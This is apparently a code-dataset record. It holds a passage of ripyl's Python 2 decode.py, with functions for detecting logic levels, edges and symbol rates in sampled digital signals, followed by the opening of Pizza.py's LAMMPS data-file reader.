# if the last bin was the start of a peak then we add it as a special case
if peak_start == len(hist)-1:
peaks.append((peak_start, peak_start))
merge_gap = len(hist) / 100.0
suppress_gap = len(hist) / 50.0
# look for peaks that are within the merge limit
peak_gaps = [b[0] - a[1] for a, b in zip(peaks[0:-1], peaks[1:])]
merged = [0] * len(peaks)
for i, gap in enumerate(peak_gaps):
if gap < merge_gap:
# merge these two peaks
peaks[i+1] = (peaks[i][0], peaks[i+1][1]) # put the prev peak start in this one
merged[i] = 1
merged_peaks = [p for i, p in enumerate(peaks) if merged[i] == 0]
# look for peaks that are within the limit for suppression
peak_gaps = [b[0] - a[1] for a, b in zip(merged_peaks[0:-1], merged_peaks[1:])]
suppressed = [0] * len(merged_peaks)
for i, gap in enumerate(peak_gaps):
if gap < suppress_gap:
# suppress the smallest of the two peaks
ix_l = i
ix_r = i+1
width_l = merged_peaks[ix_l][1] - merged_peaks[ix_l][0]
width_r = merged_peaks[ix_r][1] - merged_peaks[ix_r][0]
if width_l > width_r: # left peak is bigger
suppressed[ix_r] = 1
else: # right peak is bigger
suppressed[ix_l] = 1
filtered_peaks = [p for i, p in enumerate(merged_peaks) if suppressed[i] == 0]
return filtered_peaks
def find_logic_levels(samples, max_samples=20000, buf_size=2000):
'''Automatically determine the binary logic levels of a digital signal.
This function consumes up to max_samples from samples in an attempt
to build a buffer containing a representative set of samples at high
and low logic levels. Less than max_samples may be consumed if an edge
is found and the remaining half of the buffer is filled before the
max_samples threshold is reached.
Warning: this function is insensitive to any edge transition that
occurs within the first 100 samples. If the distribution of samples
is heavily skewed toward one level over the other None may be returned.
To be reliable, a set of samples should contain more than one edge or
a solitary edge after the 400th sample.
samples (iterable of SampleChunk objects)
An iterable sample stream. Each element is a SampleChunk containing
an array of samples.
max_samples (int)
The maximum number of samples to consume from the samples iterable.
This should be at least 2x buf_size and will be coerced to that value
if it is less.
buf_size (int)
The maximum size of the sample buffer to analyze for logic levels.
This should be less than max_samples.
Returns a 2-tuple (low, high) representing the logic levels of the samples
Returns None if less than two peaks are found in the sample histogram.
'''
# Get a minimal pool of samples containing both logic levels
# We use a statistical measure to find a likely first edge to minimize
# the chance that our buffer doesn't contain any edge transmissions.
et_buf_size = buf_size // 10 # accumulate stats on 1/10 buf_size samples before edge search
mvavg_size = 10
noise_filt_size = 3
S_FIND_EDGE = 0
S_FINISH_BUF = 1
state = S_FIND_EDGE
sc = 0
# Coerce max samples to ensure that an edge occuring toward the end of an initial
# buf_size samples can be centered in the buffer.
if max_samples < 2 * buf_size:
max_samples = 2 * buf_size
# Perform an initial analysis to determine the edge threshold of the samples
samp_it, samp_dly_it, et_it = itertools.tee(samples, 3)
et_cex = ChunkExtractor(et_it)
et_samples = et_cex.next_samples(et_buf_size)
# We will create two moving averages of this pool of data
# The first has a short period (3 samples) meant to smooth out isolated spikes of
# noise. The second (10 samples) creates a smoother waveform representing the
# local median for the creation of the differences later.
nf_mvavg_buf = collections.deque(maxlen=noise_filt_size) # noise filter
noise_filtered = []
et_mvavg_buf = collections.deque(maxlen=mvavg_size)
et_mvavg = []
for ns in et_samples:
nf_mvavg_buf.append(ns)
noise_filtered.append(sum(nf_mvavg_buf) / len(nf_mvavg_buf)) # calculate moving avg.
et_mvavg_buf.append(ns)
et_mvavg.append(sum(et_mvavg_buf) / len(et_mvavg_buf)) # calculate moving avg.
# The magnitude difference between the samples and their moving average indicates where
# steady state samples are and where edge transitions are.
mvavg_diff = [abs(x - y) for x, y in zip(noise_filtered, et_mvavg)]
# The "noise" difference is the same as above but with the moving average delay removed.
# This minimizes the peaks from edge transitions and is more representative of the noise level
# in the signal.
noise_diff = [abs(x - y) for x, y in zip(noise_filtered, et_mvavg[(mvavg_size//2)-1:])]
noise_threshold = max(noise_diff) * 1.5
# The noise threshold gives us a simple test for the presence of edges in the initial
# pool of data. This will guide our determination of the edge threshold for filling the
# edge detection buffer.
edges_present = True if max(mvavg_diff) > noise_threshold else False
# NOTE: This test for edges present will not work reliably for slowly changing edges
# (highly oversampled) especially when the SNR is low (<20dB). This should not pose an issue
# as in this case the edge_threshold (set with 5x multiplier instead of 0.6x) will stay low
# enough to permit edge detection in the next stage.
# The test for edges present will also fail when the initial samples are a periodic signal
# with a short period relative to the sample rate. To cover this case we compute an
# auto-correlation and look for more than one peak indicating the presence of periodicity.
acorr_edges_present = False
if not edges_present:
norm_noise_filt = noise_filtered - np.mean(noise_filtered)
auto_corr = np.correlate(norm_noise_filt, norm_noise_filt, 'same')
ac_max = np.max(auto_corr)
if ac_max > 0.0:
# Take the right half of the auto-correlation and normalize to 1000.0
norm_ac = auto_corr[len(auto_corr)//2:] / ac_max * 1000.0
ac_peaks = find_hist_peaks(norm_ac, thresh_scale=1.0)
if len(ac_peaks) > 1:
p1_max = np.max(norm_ac[ac_peaks[1][0]:ac_peaks[1][1]+1])
#print('$$$ p1 max:', p1_max)
if p1_max > 500.0:
acorr_edges_present = True
#print('\n$$$ auto-correlation peaks:', ac_peaks, acorr_edges_present)
#plt.plot(et_samples)
#plt.plot(norm_ac)
#plt.show()
#rev_mvavg = [(x - y) for x, y in zip(et_mvavg, reversed(et_mvavg))]
#os = OnlineStats()
#os.accumulate(rev_mvavg)
#rev_mvavg = [abs(x - os.mean()) for x in rev_mvavg]
if edges_present or acorr_edges_present:
#edge_threshold = max(mad2) * 0.75
edge_threshold = max(mvavg_diff) * 0.6
else:
# Just noise
#edge_threshold = max(mad2) * 10
edge_threshold = max(mvavg_diff) * 5
#print('$$$ edges present:', edges_present, acorr_edges_present, edge_threshold)
# For synthetic waveforms with no noise present and no edges in the initial samples we will
# get an edge_threshold of 0.0. In this case we will just set the threshold high enough to
# detect a deviation from 0.0 for any reasonable real world input
edge_threshold = max(edge_threshold, 1.0e-9)
#print('### noise, edge threshold:', noise_threshold, edge_threshold, edges_present)
del et_it
# We have established the edge threshold. We will now construct the moving avg. difference
# again. This time, any difference above the threshold will be an indicator of an edge
# transition.
if acorr_edges_present:
samp_cex = ChunkExtractor(samp_it)
buf = samp_cex.next_samples(buf_size)
state = S_FINISH_BUF
else:
mvavg_buf = collections.deque(maxlen=mvavg_size)
mvavg_dly_buf = collections.deque(maxlen=mvavg_size)
buf = collections.deque(maxlen=buf_size)
# skip initial samples to create disparity between samp_cex and dly_cex
samp_cex = ChunkExtractor(samp_it)
dly_cex = ChunkExtractor(samp_dly_it)
delay_samples = 100
samp_cex.next_samples(delay_samples)
end_loop = False
while True:
cur_samp = samp_cex.next_samples()
cur_dly_samp = dly_cex.next_samples()
if cur_samp is None:
break
for i in xrange(len(cur_samp)):
ns = cur_samp[i]
sc += 1
buf.append(ns)
if state == S_FIND_EDGE:
if sc > (max_samples - buf_size):
end_loop = True
break
mvavg_buf.append(ns)
mvavg = sum(mvavg_buf) / len(mvavg_buf) # calculate moving avg.
mvavg_dly_buf.append(cur_dly_samp[i])
mvavg_dly = sum(mvavg_dly_buf) / len(mvavg_dly_buf) # calculate moving avg.
if abs(mvavg_dly - mvavg) > edge_threshold:
# This is likely an edge event
state = S_FINISH_BUF
if len(buf) < buf_size // 2:
buf_remaining = buf_size - len(buf)
else:
buf_remaining = buf_size // 2
#print('##### Found edge {} {}'.format(len(buf), sc))
else: # S_FINISH_BUF
# Accumulate samples until the edge event is in the middle of the
# buffer or the buffer is filled
buf_remaining -= 1
if buf_remaining <= 0 and len(buf) >= buf_size:
end_loop = True
break
if end_loop:
break
#plt.plot(et_samples)
#plt.plot(et_mvavg)
#plt.plot(noise_filtered)
#plt.plot(mvavg_diff)
#plt.plot(noise_diff)
#plt.plot(rev_mvavg)
#plt.axhline(noise_threshold, color='r')
#plt.axhline(edge_threshold, color='g')
#plt.plot(buf)
#plt.show()
# If we didn't see any edges in the buffered sample data then abort
# before the histogram analysis
if state != S_FINISH_BUF:
return None
try:
logic_levels = find_bot_top_hist_peaks(buf, 100, use_kde=True)
#print('### ll:', logic_levels, min(buf), max(buf))
except ValueError:
logic_levels = None
#print('%%% logic_levels', logic_levels)
return logic_levels
def check_logic_levels(samples, max_samples=20000, buf_size=2000):
'''Automatically determine the binary logic levels of a digital signal.
This is a wrapper for find_logic_levels() that handles teeing off
a buffered sample stream and raising AutoLevelError when detection
fails.
samples (iterable of SampleChunk objects)
An iterable sample stream. Each element is a SampleChunk containing
an array of samples. This iterator is internally tee'd and becomes
invalidated for further use. The return value includes a new sample
stream to retrieve samples from.
max_samples (int)
The maximum number of samples to consume from the samples iterable.
This should be at least 2x buf_size and will be coerced to that value
if it is less.
buf_size (int)
The maximum size of the sample buffer to analyze for logic levels.
This should be less than max_samples.
Returns a 2-tuple (sample steam, logic_levels) representing the buffered sample
stream and a tuple of the detected logic levels of the samples.
Raises AutoLevelError if less than two peaks are found in the sample histogram.
'''
# tee off an iterator to determine logic thresholds
samp_it, thresh_it = itertools.tee(samples)
logic_levels = find_logic_levels(thresh_it, max_samples, buf_size)
del thresh_it
if logic_levels is None:
raise AutoLevelError
return samp_it, logic_levels
def find_edges(samples, logic, hysteresis=0.4):
'''Find the edges in a sampled digital waveform
This is a generator function that can be used in a pipeline of waveform
procesing operations.
samples (iterable of SampleChunk objects)
An iterable sample stream. Each element is a SampleChunk containing
an array of samples.
logic ((float, float))
A 2-tuple (low, high) representing the mean logic levels in the sampled waveform
hysteresis (float)
A value between 0.0 and 1.0 representing the amount of hysteresis the use for
detecting valid edge crossings.
Yields a series of 2-tuples (time, value) representing the time and
logic value (0 or 1) for each edge transition. The first tuple
yielded is the initial state of the sampled waveform. All remaining
tuples are detected edges.
Raises StreamError if the stream is empty
'''
span = logic[1] - logic[0]
thresh = (logic[1] + logic[0]) / 2.0
hyst_top = span * (0.5 + hysteresis / 2.0) + logic[0]
hyst_bot = span * (0.5 - hysteresis / 2.0) + logic[0]
# A sample can be in one of three zones: two logic states (1, 0) and
# one transition bands for the hysteresis
ZONE_1_L1 = 1 # logic 1
ZONE_2_T = 2 # transition
ZONE_3_L0 = 3 # logic 0
def get_sample_zone(sample):
if sample > hyst_top:
zone = ZONE_1_L1
elif sample > hyst_bot:
zone = ZONE_2_T
else:
zone = ZONE_3_L0
return zone
def is_stable_zone(zone):
return zone == ZONE_1_L1 or zone == ZONE_3_L0
def zone_to_logic_state(zone):
ls = 999
if zone == ZONE_1_L1: ls = 1
elif zone == ZONE_3_L0: ls = 0
return ls
# states
ES_START = 0
state = ES_START
for sc in samples:
t = sc.start_time
sample_period = sc.sample_period
chunk = sc.samples
if state == ES_START: # set initial edge state
initial_state = (t, 1 if chunk[0] > thresh else 0)
yield initial_state
for sample in chunk:
zone = get_sample_zone(sample)
if state == ES_START:
# Stay in start until we reach one of the stable states
if is_stable_zone(zone):
state = zone
# last zone was a stable state
elif state == ZONE_1_L1 or state == ZONE_3_L0:
if is_stable_zone(zone):
if zone != state:
state = zone
yield (t, zone_to_logic_state(zone))
else:
prev_stable = state
state = zone
# last zone was a transitional state (in hysteresis band)
elif state == ZONE_2_T:
if is_stable_zone(zone):
if zone != prev_stable: # This wasn't just noise
yield (t, zone_to_logic_state(zone))
state = zone
t += sample_period
def expand_logic_levels(logic_levels, count):
'''Generate evenly spaced logic levels
logic_levels ((float, float))
A 2-tuple (low, high) representing the min and max logic level to expand on
count (int)
The number of logic levels in the result. If the value is less than 3, the
result is the same as the sequence passed as logic_levels.
Returns a list of logic levels with count length representing each logic level
evenly spaced between logic_levels[0] and logic_levels[1].
'''
if count >= 3:
step = (logic_levels[1] - logic_levels[0]) / (count - 1)
return [logic_levels[0]] + [logic_levels[0] + i * step for i in xrange(1, count-1)] + [logic_levels[1]]
else:
return logic_levels
def gen_hyst_thresholds(logic_levels, expand=None, hysteresis=0.1):
'''Generate hysteresis thresholds for find_multi_edges()
This function computes the hysteresis thresholds for multi-level edge finding
with find_multi_edges().
logic_levels (sequence of float)
A sequence of the nominal voltage levels for each logic state sorted
in ascending order or the (low, high) pair when expansion is used.
expand (int or None)
When not None, the number of logic levels to expand the provided logic_levels into.
hysteresis (float)
A value between 0.0 and 1.0 representing the amount of hysteresis the use for
detecting valid edge crossings.
Returns a list of floats. Every pair of numbers represents a hysteresis band.
'''
if expand:
assert len(logic_levels) == 2, 'Expansion requires exactly two logic levels.'
logic_levels = expand_logic_levels(logic_levels, expand)
assert len(logic_levels) >= 2, 'There must be at least two logic levels'
centers = []
for a, b in zip(logic_levels[0:-1], logic_levels[1:]):
centers.append((a + b) / 2.0)
hyst = []
hysteresis = min(max(hysteresis, 0.0), 1.0) # Coerce to range [0.0, 1.0]
for level, c in zip(logic_levels[0:-1], centers):
h_top = (c - level) * (1 + hysteresis) + level
h_bot = (c - level) * (1 - hysteresis) + level
hyst.extend((h_bot, h_top))
return hyst
def find_multi_edges(samples, hyst_thresholds):
'''Find the multi-level edges in a sampled digital waveform
This is a generator function that can be used in a pipeline of waveform
procesing operations.
Note that the output of this function cannot be used directly without further
processing. Transitions across multiple states cannot be easily
distinguished from transitions incliding intermediate states.
For the case of three states (-1, 0, 1), Short periods in the 0 state
should be removed but this requires knowledge of the minimum time for a 0 state
to be valid. This is performed by the remove_transitional_states() function.
The logic state encoding is formulated to balance the number of positive and negative
states around 0 for odd numbers of states and with one extra positive state for even
state numbers. For 2 states the encoding is the usual (0,1). For 3: (-1, 0, 1).
For 4: (-1, 0, 1, 2). For 5: (-2, -1, 0, 1, 2), etc.
samples (iterable of SampleChunk objects)
An iterable sample stream. Each element is a SampleChunk containing
an array of samples.
hyst_thresholds (sequence of float)
A sequence containing the hysteresis thresholds for the logic states.
For N states there should be (N-1) * 2 thresholds.
The gen_hyst_thresholds() function can compute these values from more
usual logic parameters. The numbers must be sorted in ascending order.
Every pair of numbers in the sequence forms the bounds of a hysteresis
band. Samples within these bands are considered transient states. Samples
outside these bands are the valid logic states.
Yields a series of 2-tuples (time, int) representing the time and
logic value for each edge transition. The first tuple
yielded is the initial state of the sampled waveform. All remaining
tuples are detected edges.
Raises StreamError if the stream is empty
'''
assert len(hyst_thresholds) % 2 == 0, 'There must be an even number of hyst_thresholds'
# To establish the initial state we need to compare the first sample against thresholds
# without involving any hysteresis. We compute new thresholds at the center of each
# hysteresis pair.
center_thresholds = []
for i in xrange(0, len(hyst_thresholds), 2):
center_thresholds.append((hyst_thresholds[i] + hyst_thresholds[i+1]) / 2.0)
def get_sample_zone(sample):
for i in xrange(len(hyst_thresholds)):
if sample <= hyst_thresholds[i]:
return i
# The sample is greater than the highest threshold
return len(hyst_thresholds)
def is_stable_zone(zone):
return zone % 2 == 0 # Even zones are stable
# Compute offset between zone codings and the final logic state coding
# logic state = zone // 2 - zone_offset
zone_offset = len(hyst_thresholds) // 4
#print('### zone offset:', zone_offset, len(hyst_thresholds), hyst_thresholds, center_thresholds)
def zone_to_logic_state(zone):
if zone % 2 == 1: # Odd zones are in hysteresis transition bands
return 999
return zone // 2 - zone_offset
# states
ES_START = 1000
# NOTE: The remaining states have the same encoding as the zone numbers.
# These are integers starting from 0. Even zones represent stable states
# corresponding to the logic levels we want to detect. Odd zones represent
# unstable states corresponding to samples within the hysteresis transition bands.
state = ES_START
for sc in samples:
t = sc.start_time
#sample_period = sc.sample_period
#chunk = sc.samples
if state == ES_START: # Set initial edge state
#initial_state = (t, 1 if chunk[0] > thresh_high else 0 if chunk[0] > thresh_low else -1)
center_ix = len(center_thresholds)
for i in xrange(center_ix):
if sc.samples[0] <= center_thresholds[i]:
center_ix = i
break
initial_state = (t, center_ix - zone_offset)
yield initial_state
for sample in sc.samples:
#zone = get_sample_zone(sample)
#zone_is_stable = is_stable_zone(zone)
zone = len(hyst_thresholds)
for i in xrange(len(hyst_thresholds)):
if sample <= hyst_thresholds[i]:
zone = i
break
zone_is_stable = zone % 2 == 0
if state == ES_START:
# Stay in start until we reach one of the stable states
if zone_is_stable:
state = zone
else:
if state % 2 == 0: # last zone was a stable state
if zone_is_stable:
if zone != state:
state = zone
yield (t, zone // 2 - zone_offset) #zone_to_logic_state(zone))
else:
prev_stable = state
state = zone
else: # last zone was a transitional state (in hysteresis band)
if zone_is_stable:
if zone != prev_stable: # This wasn't just noise
yield (t, zone // 2 - zone_offset) #zone_to_logic_state(zone))
state = zone
t += sc.sample_period
def remove_transitional_states(edges, min_state_period):
'''Filter out brief transitional states from an edge stream
This is a generator function that can be used in a pipeline of waveform
procesing operations.
edges (iterable of (float, int) tuples)
An iterable of 2-tuples representing each edge transition.
The 2-tuples *must* be in the absolute time form (time, logic level).
min_state_period (float)
The threshold for transitional states. A transition lasting less than this
threshold will be filtered out of the edge stream.
Yields a series of 2-tuples (time, value) representing the time and
logic value for each edge transition. The first tuple yielded is the
initial state of the sampled waveform. All remaining tuples are
detected edges.
Raises StreamError if the stream is empty
'''
# Get the first edge
try:
prev_edge = next(edges)
except StopIteration:
raise StreamError('Unable to initialize edge stream')
in_transition = False
tran_start = None
for edge in edges:
ts = edge[0] - prev_edge[0]
if in_transition:
ts += prev_edge[0] - tran_start[0] # Include current transition in time step
if ts >= min_state_period:
if in_transition:
# Merge edges
merge_edge = ((tran_start[0] + prev_edge[0]) / 2, prev_edge[1])
yield merge_edge
in_transition = False
else:
yield prev_edge
elif not in_transition: # Start of a transition
in_transition = True
tran_start = prev_edge
prev_edge = edge
yield prev_edge # Last edge
def find_symbol_rate(edges, sample_rate=1.0, spectra=2, auto_span_limit=True, max_span_limit=None):
'''Determine the base symbol rate from a set of edges
This function depends on the edge data containing a variety of spans between
edges all related to the fundamental symbol rate. The Harmonic Product Spectrum
(HPS) of the edge span values is calculated and used to isolate the fundamental
symbol rate. This function will not work properly on a clock signal containing
a single time span between edges due to the lack of higher fundementals needed
by the HPS unless spectra=1 which effectively disables the HPS operation.
edges ([(float, int)...] or [(int, int)...])
An iterable of 2-tuples representing each edge transition.
The tuples are in one of two forms:
* absolute time (time, logic level)
* sample indexed (index, logic level)
This function will consume all elements of the edges iterable.
It must have a finite length
sample_rate (float)
An adjustment to convert the raw symbol rate from samples to time.
If the edges parameter is based on absolute time units then this
should remain the default value of 1.0.
spectra (int)
The number of spectra to include in the calculation of the HPS. This
number should not larger than the highest harmonic in the edge span
data.
auto_span_limit (bool)
Excessively long edge spans can impair the symbol rate detection by
reducing the resolution of the HPS. They are typically the result of
long idle periods between the interesting parts we want to estimate
the symbol rate from. When this parameter is True, an attempt is made
to find the ideal limit for the spans included in the HPS.
max_span_limit (int)
An optional upper limit for span length to include in the HPS.
auto_span_limit must be False for this to take effect.
Returns the estimated symbol rate of the edge data set as an int
Raises ValueError if there are not enough edge spans to evaluate
a HPS.
'''
e = zip(*edges)
e2 = np.array(e[0][1:]) # Get the sample indices of each edge after the first one
spans = e2[1:] - e2[:-1] # Time span (in samples) between successive edges
#plt.plot(e[0], e[1])
#plt.show()
if auto_span_limit:
# Automatically find maximum span limit
# The bw_method parameter is set to smear all small peaks together so
# that the first peak of the KDE covers the most relevant parts to
# measure the symbol rate from.
mv = max(spans) * 1.1 # leave some extra room for the rightmost peak of the KDE
bins = 1000
step = mv / bins
x_hps = np.arange(0, mv, step)[:bins]
if len(spans) == 0:
raise ValueError('Insufficient spans in edge set')
kde = sp.stats.gaussian_kde(spans, bw_method=0.8)
asl = kde(x_hps)[:bins]
# Get the width of the first peak
peaks = find_hist_peaks(asl)
if len(peaks) >= 1:
max_span_limit = x_hps[peaks[0][1]] * 2 # set limit to 2x the right edge of the peak
if max_span_limit is not None:
spans = [s for s in spans if s < max_span_limit]
if len(spans) == 0:
raise ValueError('Insufficient spans in edge set')
mv = max(spans) * 1.1 # leave some extra room for the rightmost peak of the KDE
bins = 1000
step = mv / bins
x_hps = np.arange(0, mv, step)[:bins]
# generate kernel density estimate of span histogram
kde = sp.stats.gaussian_kde(spans, bw_method=0.02)
# Compute the harmonic product spectrum from the KDE
# This should leave us with one strong peak for the span corresponding to the
# fundamental symbol rate.
hps = kde(x_hps)[:bins] # fundamental spectrum (slice needed because sometimes kde() returns bins+1 elements)
# Find all peaks in the fundamental spectrum
all_peaks = find_hist_peaks(hps)
hps_pairs = zip(x_hps, hps)
all_peak_spans = [max(hps_pairs[pk[0]:pk[1]+1], key=lambda x: x[1])[0] for pk in all_peaks]
#print('$$$ all peak spans:', all_peak_spans)
#plt.plot(x_hps, hps / hps[np.argmax(hps)])
#print('$$$ hps peak:', max(hps))
tallest_initial_peak = max(hps)
# isolate the fundamental span width by multiplying downshifted spectra
for i in xrange(2, spectra+1):
hps *= kde(np.arange(0, mv*i, step*i))[:len(hps)]
#k = kde(np.arange(0, mv*i, step*i))[:len(hps)]
#plt.plot(x_hps, k / k[np.argmax(k)])
#print('$$$ k peak:', max(k))
#hps *= k
#print('$$$ hps peak:', max(hps))
#plt.plot(x_hps, hps / hps[np.argmax(hps)])
#plt.show()
# It is possible to get anomalous HPS peaks with extremely small values.
# If the tallest peak in the final HPS isn't within three orders of magnitude
# we will consider the HPS invalid.
if max(hps) < tallest_initial_peak / 1000.0:
return 0
peaks = find_hist_peaks(hps)
if len(peaks) < 1:
return 0
# We want the leftmost (first) peak of the HPS as the fundamental
# This should be approximately the length of one bit period
hps_pairs = zip(x_hps, hps)
peak_span = max(hps_pairs[peaks[0][0]:peaks[0][1]+1], key=lambda x: x[1])[0]
if peak_span != 0.0:
# In cases where the 2nd harmonic is missing but the 3rd and 6th are present
# we can miss the true fundamental span in the HPS.
# Check if there was a peak span in the pre-HPS spectrum that is 1/3 of this peak.
# If so then this peak is not likely the true fundamental.
for pk in all_peak_spans:
if relatively_equal(pk, peak_span / 3, 0.01):
#print('$$$ MISSED harmonic', pk, peak_span)
return 0
symbol_rate = int(sample_rate / peak_span)
else:
symbol_rate = 0
return symbol_rate
#FIX: clean up use of cur_time, cur_state, cur_state(), next_states, etc.
class EdgeSequence(object):
'''Utility class to walk through an edge iterator in arbitrary time steps'''
def __init__(self, edges, time_step, start_time=None):
'''
edges (sequence of (float, int) tuples)
An iterable of 2-tuples representing each edge transition.
The 2-tuples *must* be in the absolute time form (time, logic level).
time_step (float)
The default time step for advance() when it is called
without an argument.
start_time (float)
The initial starting time for the sequence.
Raises StreamError when there are less than two elements to the edges iterable
'''
self.edges = edges
self.time_step = time_step
self.it_end = False
try:
self.cur_states = next(self.edges)
self.next_states = next(self.edges)
except StopIteration:
self.it_end = True
raise StreamError('Not enough edges to initialize edge_sequence() object')
self.cur_time = self.cur_states[0]
if start_time is not None:
init_step = start_time - self.cur_time
if init_step > 0.0:
self.advance(init_step)
def advance(self, time_step=None):
'''Move forward through edges by a given amount of time.
time_step (float)
The amount of time to move forward. If None, the default
time_step from the constructor is used.
'''
if time_step == None:
time_step = self.time_step
self.cur_time += time_step
while self.cur_time > self.next_states[0]:
self.cur_states = self.next_states
try:
self.next_states = next(self.edges)
except StopIteration:
self.it_end = True
break
def advance_to_edge(self):
'''Advance to the next edge in the iterator after the current time
Returns the amount of time advanced as a float.
'''
if self.it_end:
return 0.0
start_state = self.cur_states[1]
while self.cur_states[1] == start_state:
self.cur_states = self.next_states
try:
self.next_states = next(self.edges)
except StopIteration:
# flag end of sequence if the state remains the same (no final edge)
if self.cur_states[1] == start_state:
self.it_end = True
break
time_step = self.cur_states[0] - self.cur_time
self.cur_time = self.cur_states[0]
return time_step
def cur_state(self):
'''The logic level of the edge iterator at the current time'''
return self.cur_states[1]
def at_end(self):
'''Returns True when the edge iterator has terminated'''
return self.it_end
class MultiEdgeSequence(object):
'''Utility class to walk through a group of edge iterators in arbitrary time steps'''
def __init__(self, edge_sets, time_step, start_time=None):
'''
edge_sets (dict)
A dict of edge sequence iterators keyed by the string name of the channel
time_step (float)
The default time step for advance() when it is called
without an argument.
start_time (float)
The initial starting time for the sequence.
'''
self.channel_names, self.edge_chans = zip(*edge_sets.items())
self.sequences = [EdgeSequence(e, time_step, start_time) for e in self.edge_chans]
self.channel_ids = {}
for i, cid in enumerate(self.channel_names):
self.channel_ids[cid] = i
def advance(self, time_step=None):
'''Move forward through edges by a given amount of time.
time_step (float)
The amount of time to move forward. If None, the default
time_step from the constructor is used.
'''
for s in self.sequences:
s.advance(time_step)
def advance_to_edge(self, channel_name=None):
'''Advance to the next edge among the edge sets or in a named channel
after the current time
channel_name (string)
If None, the edge sets are advanced to the closest edge after the current
time. if a valid channel name is provided the edge sets are advanced to
the closest edge on that channel.
Returns a tuple (time, channel_name) representing the amount of time advanced
as a float and the name of the channel containing the edge. If there are no
unterminated edge sequences then the tuple (0,0, '') is returned.
Raises ValueError if channel_name is invalid
'''
# get the sequence for the channel
if channel_name is None:
# find the channel with the nearest edge after the current time
# that hasn't ended
active_seq = []
for s in self.sequences:
if not s.at_end():
active_seq.append(s)
if len(active_seq) > 0:
edge_s = min(active_seq, key=lambda x: x.next_states[0])
# find its channel id
for k, v in self.channel_ids.iteritems():
if self.sequences[v] is edge_s:
channel_name = k
break
else: # no active sequences left
return (0.0, '')
else:
# check for channel_name in sets
if channel_name in self.channel_ids.iterkeys():
edge_s = self.sequences[self.channel_ids[channel_name]]
else:
raise ValueError("Invalid channel name '{0}'".format(channel_name))
time_step = edge_s.advance_to_edge()
# advance the other channels to the same time
if time_step > 0.0:
for s in self.sequences:
if not s is edge_s:
s.advance(time_step)
return (time_step, channel_name)
def cur_state(self, channel_name=None):
'''Get the current state of the edge sets
channel_name (string)
Name of the channel to retrieve state from
Returns the value of the named channel's state. If channel_name is None
the state of all channels is returned as a list.
Raises ValueError if channel_name is invalid
'''
if channel_name is None:
return [s.cur_state() for s in self.sequences]
else:
if channel_name in self.channel_ids.iterkeys():
return self.sequences[self.channel_ids[channel_name]].cur_state()
else:
raise ValueError("Invalid channel name '{0}'".format(channel_name))
def cur_time(self):
'''Get the current time of the edge sets'''
return self.sequences[0].cur_time
def at_end(self, channel_name=None):
'''Test if the sequences have ended
channel_name (string)
The name of the channel to test for termination
Returns True when the named edge iterator has terminated. If channel_name is
None, returns True when all channels in the set have terminated.
Raises ValueError if channel_name is invalid
'''
if channel_name is None:
return all(s.at_end() for s in self.sequences)
else:
if channel_name in self.channel_ids.iterkeys():
return self.sequences[self.channel_ids[channel_name]].at_end()
else:
raise ValueError("Invalid channel name '{0}'".format(channel_name))
| kevinpt/ripyl | ripyl/decode.py | Python | lgpl-3.0 | 48,118 | [
"Gaussian"
] | fc2994fc570f73cee242ccaf758b84bb0e9c6f1348e41b988f780cd92d48963a |
# Pizza.py toolkit, www.cs.sandia.gov/~sjplimp/pizza.html
# Steve Plimpton, sjplimp@sandia.gov, Sandia National Laboratories
#
# Copyright (2005) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
# data tool
oneline = "Read, write, manipulate LAMMPS data files"
docstr = """
d = data("data.poly") read a LAMMPS data file, can be gzipped
d = data() create an empty data file
d.map(1,"id",3,"x") assign names to atom columns (1-N)
coeffs = d.get("Pair Coeffs") extract info from data file section
q = d.get("Atoms",4)
1 arg = all columns returned as 2d array of floats
2 args = Nth column returned as vector of floats
d.reorder("Atoms",1,3,2,4,5) reorder columns (1-N) in a data file section
1,3,2,4,5 = new order of previous columns, can delete columns this way
d.title = "My LAMMPS data file" set title of the data file
d.headers["atoms"] = 1500 set a header value
d.sections["Bonds"] = lines set a section to list of lines (with newlines)
d.delete("bonds") delete a keyword or section of data file
d.delete("Bonds")
d.replace("Atoms",5,vec) replace Nth column of section with vector
d.newxyz(dmp,1000) replace xyz in Atoms with xyz of snapshot N
newxyz assumes id,x,y,z are defined in both data and dump files
also replaces ix,iy,iz if they are defined
index,time,flag = d.iterator(0/1) loop over single data file snapshot
time,box,atoms,bonds,tris,lines = d.viz(index) return list of viz objects
iterator() and viz() are compatible with equivalent dump calls
iterator() called with arg = 0 first time, with arg = 1 on subsequent calls
index = timestep index within dump object (only 0 for data file)
time = timestep value (only 0 for data file)
flag = -1 when iteration is done, 1 otherwise
viz() returns info for specified timestep index (must be 0)
time = 0
box = [xlo,ylo,zlo,xhi,yhi,zhi]
atoms = id,type,x,y,z for each atom as 2d array
bonds = id,type,x1,y1,z1,x2,y2,z2,t1,t2 for each bond as 2d array
NULL if bonds do not exist
tris = NULL
lines = NULL
d.write("data.new") write a LAMMPS data file
"""
# History
# 8/05, Steve Plimpton (SNL): original version
# 11/07, added triclinic box support
# ToDo list
# Variables
# title = 1st line of data file
# names = dictionary with atom attributes as keys, col #s as values
# headers = dictionary with header name as key, value or tuple as values
# sections = dictionary with section name as key, array of lines as values
# nselect = 1 = # of snapshots
# Imports and external programs
from os import popen
try: tmp = PIZZA_GUNZIP
except: PIZZA_GUNZIP = "gunzip"
# Class definition
class data:
# --------------------------------------------------------------------
def __init__(self,*list):
self.nselect = 1
if len(list) == 0:
self.title = "LAMMPS data file"
self.names = {}
self.headers = {}
self.sections = {}
return
file = list[0]
if file[-3:] == ".gz": f = popen("%s -c %s" % (PIZZA_GUNZIP,file),'r')
else: f = open(file)
self.title = f.readline()
self.names = {}
headers = {}
while 1:
line = f.readline()
line = line.strip()
if len(line) == 0:
continue
found = 0
for keyword in hkeywords:
if line.find(keyword) >= 0:
found = 1
words = line.split()
if keyword == "xlo xhi" or keyword == "ylo yhi" or \
keyword == "zlo zhi":
headers[keyword] = (float(words[0]),float(words[1]))
elif keyword == "xy xz yz":
headers[keyword] = \
(float(words[0]),float(words[1]),float(words[2]))
else:
headers[keyword] = int(words[0])
if not found:
break
sections = {}
while 1:
found = 0
for pair in skeywords:
keyword,length = pair[0],pair[1]
if keyword == line:
found = 1
if not headers.has_key(length):
raise StandardError, \
"data section %s has no matching header value" % line
f.readline()
list = []
for i in xrange(headers[length]): list.append(f.readline())
sections[keyword] = list
if not found:
raise StandardError,"invalid section %s in data file" % line
f.readline()
line = f.readline()
if not line:
break
line = line.strip()
